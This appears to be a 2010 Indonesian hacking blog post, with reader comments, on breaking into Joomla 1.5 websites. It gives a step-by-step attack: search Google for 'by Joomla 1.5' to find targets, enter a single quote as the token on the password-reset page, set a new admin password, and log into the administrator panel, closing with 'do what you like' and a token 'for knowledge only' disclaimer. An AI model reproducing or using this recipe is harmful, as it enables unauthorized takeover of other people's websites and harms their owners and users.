MEMBOBOL WEBSITE JOOMLA

Posted: 1 Maret 2010 in Hacking & Security
Tag:, , , , , , , , , , , ,

Joomla merupakan salah satu content management system (CMS) yang cukup populer. Namun, Joomla terbaru, versi 1.5, memiliki celah keamanan yang cukup fatal. Polanya sama dengan SQL Injection yang relatif kuno. SQL Injection juga pernah dipake xnuxer untuk membobol situs Komisi Pemilihan umum (KPU) beberapa tahun lampau.
Berikut ini cara-cara membobol situs berbasis Joomla 1.5.

1. Buka alamat target yang menggunakan Joomla 1.5. Anda bisa menemukan di Google dengan mengetikkan “by Joomla 1.5? di kolom pencrian. Sebab, secara default, kalimat ini ada dalam setiap footer situs berbasis Joomla 1.5.
2. Tambahkan baris di bawah ini setelah alamat target.
index.php?option=com_user&view=reset&layout=confirm
Menjadi:
target.com/index.php?option=com_user&view=reset&layout=confirm
2. Tuliskan pada kolom “token” karakter ‘ dan klik OK.
3. Isi password baru untuk admin.
4. Buka halaman target.com/administrator/.
5. Login admin dengan password baru.
6. Lakukan yang Anda suka secara bertanggung jawab.

Cara ini terjadi karena kesalahan coding pada file /components/com_user/models/reset.php dan /components/com_user/models/controller.php.
Posting ini hanya untuk pengetahuan. Segala bentuk penyalahgunaaan adalah tanggung jawab masing-masing orang.

Forgot username : target.com/index.php?option=com_user&view=remind

Forgot password : target.com/index.php?option=com_user&view=reset
register : target.com/index.php?option=com_user&view=register

Iklan
Komentar
  1. besuki berkata:

    kok gagal terus bro. Gak bisa nih

  2. Ahmad Rapani berkata:

    Bos para master heacker… saya minta coba di tes web ini… http://rapani-id.com/ itu saya bikin dari joomla yang udah dimodifikasi abis…. semua sript php nya.. silahkan di tes bos…. saya mau tau kelemahannya….?
    salam.. by rapani Loebis

Tinggalkan Balasan

Isikan data di bawah atau klik salah satu ikon untuk log in:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout / Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout / Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout / Ubah )

Foto Google+

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s